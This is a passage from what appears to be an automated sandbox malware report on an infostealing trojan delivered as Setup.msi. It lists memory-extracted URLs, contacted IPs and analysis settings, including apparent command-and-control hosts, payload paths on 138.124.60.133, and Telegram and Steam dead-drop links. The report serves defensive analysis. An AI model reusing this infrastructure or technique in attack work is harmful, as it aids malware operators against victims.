                                                                https://anglebug.com/7246chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://anglebug.com/7369chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2082140205.0000017A00227000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://anglebug.com/7489chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2082140205.0000017A00227000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://chrome.google.com/webstorechrome.exe, 0000001D.00000003.2537620059.0000600400338000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://drive-daily-2.corp.google.com/chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://polymer.github.io/PATENTS.txtchrome.exe, 0000001D.00000003.2537105899.0000600400FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535849991.00006004010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2536965697.0000600400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535422475.0000600401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537526965.00006004010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537060413.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537661189.000060040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537022593.00006004007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535958699.0000600401080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.000060040040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535883119.0000600400F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535811313.0000600401058000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://contoso.com/Iconpowershell.exe, 00000009.00000002.2107972930.0000017A10075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 0000001D.00000003.2532799851.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557159264.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2581109973.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537282781.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2567164223.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557743072.0000600400C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Corrections.com, 0000001A.00000002.3004594101.0000000003992000.00000004.00000800.00020000.00000000.sdmp, 9ZCBA1.26.drfalse
                                                                                      		high
                                                                                      http://crl.ver)svchost.exe, 0000001E.00000002.3005946928.000001DA290A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaCorrections.com, 0000001A.00000002.3006622611.0000000003B40000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3004996971.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, K6XT0Z.26.drfalse
                                                                                          		high
                                                                                          http://www.autoitscript.com/autoit3/XCorrections.com, 0000001A.00000000.2135017638.0000000001015000.00000002.00000001.01000000.0000000D.sdmp, Appeals.16.drfalse
                                                                                            		high
                                                                                            https://issuetracker.google.com/161903006chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.ecosia.org/newtab/Corrections.com, 0000001A.00000002.3004594101.0000000003992000.00000004.00000800.00020000.00000000.sdmp, 9ZCBA1.26.drfalse
                                                                                                		high
                                                                                                https://drive-daily-1.corp.google.com/chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2082140205.0000017A00227000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://t.me/detct0rd0wntgMozilla/5.0Corrections.com, 0000001A.00000002.3007890735.0000000004041000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://drive-daily-5.corp.google.com/chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://anglebug.com/3078chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://anglebug.com/7553chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://anglebug.com/5375chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://anglebug.com/5371chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://anglebug.com/4722chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000009.00000002.2082140205.0000017A00227000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://anglebug.com/7556chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://steamcommunity.com/profiles/76561199807592927d0wntgMozilla/5.0Corrections.com, 0000001A.00000002.3007890735.0000000004041000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://drive-preprod.corp.google.com/chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://138.124.60.18powershell.exe, 00000009.00000002.2082140205.0000017A00FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesCorrections.com, 0000001A.00000002.3004996971.00000000039A2000.00000004.00000800.00020000.00000000.sdmp, EKNYUS.26.drfalse
                                                                                                                            		high
                                                                                                                            http://138.124.60.8powershell.exe, 00000009.00000002.2082140205.0000017A00FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://sedone.onlineCorrections.com, 0000001A.00000002.3007890735.000000000412A000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://sedone.online.iomingCorrections.com, 0000001A.00000002.3007890735.000000000412A000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                http://anglebug.com/6692chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://issuetracker.google.com/258207403chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://138.8powershell.exe, 00000009.00000002.2082140205.0000017A00FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    http://anglebug.com/3502chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://anglebug.com/3623chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://sedone.online/empCorrections.com, 0000001A.00000002.3004390803.00000000038DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                        		unknown
                                                                                                                                        http://anglebug.com/3625chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://anglebug.com/3624chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://anglebug.com/5007chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://anglebug.com/3862chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://138.124.60.138powershell.exe, 00000009.00000002.2082140205.0000017A00FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                https://chrome.google.com/webstoreLDDiscoverchrome.exe, 0000001D.00000003.2534488464.0000600400D10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2538918746.0000600400D10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2532036292.0000600400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2532761049.0000600400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2533336865.0000600400D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2533277142.0000600400338000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537620059.0000600400338000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.ecosia.org/search?q=&addon=opensearchchrome.exe, 0000001D.00000003.2532799851.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557159264.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2581109973.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537282781.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2567164223.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557743072.0000600400C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://anglebug.com/4836chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://issuetracker.google.com/issues/166475273chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557743072.0000600400C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://138.124.60.133/lem8powershell.exe, 00000009.00000002.2082140205.0000017A00FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://sedone.onlineNGVAACorrections.com, 0000001A.00000002.3007890735.000000000412A000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://138.124.60.133/lem.ex8powershell.exe, 00000009.00000002.2082140205.0000017A00FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://anglebug.com/4384chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://138.124.60.133/l8powershell.exe, 00000009.00000002.2082140205.0000017A00FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://mail.google.com/mail/?tab=rm&amp;ogblchrome.exe, 0000001D.00000003.2578370556.000060040304C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578206013.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577269475.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577570541.0000600402FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://anglebug.com/3970chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://apis.google.comchrome.exe, 0000001D.00000003.2577269475.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577570541.0000600402FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://138.124.60.133/lem.8powershell.exe, 00000009.00000002.2082140205.0000017A00FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://support.mozilla.org/products/firefoxgro.allCorrections.com, 0000001A.00000002.3009200532.0000000005FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://polymer.github.io/CONTRIBUTORS.txtchrome.exe, 0000001D.00000003.2537105899.0000600400FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535849991.00006004010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2536965697.0000600400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535422475.0000600401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537526965.00006004010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537060413.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537661189.000060040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537022593.00006004007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535958699.0000600401080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.000060040040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535883119.0000600400F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535811313.0000600401058000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://labs.google.com/search?source=ntpchrome.exe, 0000001D.00000003.2578370556.000060040304C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578206013.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577269475.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577570541.0000600402FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 0000001D.00000003.2513625099.000027CC003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2513399171.000027CC003A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://anglebug.com/7604chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://anglebug.com/7761chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://ogs.google.com/widget/app/so?eom=1chrome.exe, 0000001D.00000003.2577269475.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577570541.0000600402FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://anglebug.com/7760chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgCorrections.com, 0000001A.00000002.3006622611.0000000003B40000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3004996971.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, K6XT0Z.26.drfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoCorrections.com, 0000001A.00000002.3004594101.0000000003992000.00000004.00000800.00020000.00000000.sdmp, 9ZCBA1.26.drfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://anglebug.com/5901chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://anglebug.com/3965chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://anglebug.com/6439chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://anglebug.com/7406chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://www.google.com/searchchrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high

                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                116.203.12.114
                                                                                                                                                                                                		sedone.onlineGermany
                                                                                                                                                                                                		24940HETZNER-ASDEfalse
                                                                                                                                                                                                149.154.167.99
                                                                                                                                                                                                		t.meUnited Kingdom
                                                                                                                                                                                                		62041TELEGRAMRUfalse
                                                                                                                                                                                                142.250.181.100
                                                                                                                                                                                                		www.google.comUnited States
                                                                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                                		unknownReserved
                                                                                                                                                                                                		unknownunknownfalse
                                                                                                                                                                                                138.124.60.133
                                                                                                                                                                                                		unknownNorway
                                                                                                                                                                                                		8983NOKIA-ASFIfalse

                                                                                                                                                                                                Private

                                                                                                                                                                                                IP
                                                                                                                                                                                                192.168.2.4
                                                                                                                                                                                                127.0.0.1

                                                                                                                                                                                                General Information

                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                Analysis ID:1576875
                                                                                                                                                                                                Start date and time:2024-12-17 17:27:02 +01:00
                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                Overall analysis duration:0h 9m 34s
                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                Number of analysed new started processes analysed:32
                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                Sample name:Setup.msi
                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winMSI@58/88@5/7
                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                • Successful, ratio: 75%
                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                • Successful, ratio: 96%
                                                                                                                                                                                                • Number of executed functions: 41
                                                                                                                                                                                                • Number of non-executed functions: 182
                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                • Found application associated with file extension: .msi

                                                                                                                                                                                                Warnings

                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 2.22.50.131, 2.22.50.144, 192.229.221.95, 172.217.19.227, 172.217.19.206, 64.233.164.84, 172.217.17.46, 23.218.208.109, 142.250.181.3, 4.245.163.56, 13.107.246.63
                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, e16604.g.akamaiedge.net, clients.l.google.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
                                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 8052 because it is empty
                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                • VT rate limit hit for: Setup.msi

                                                                                                                                                                                                Simulations

                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                11:28:03API Interceptor1x Sleep call for process: msiexec.exe modified
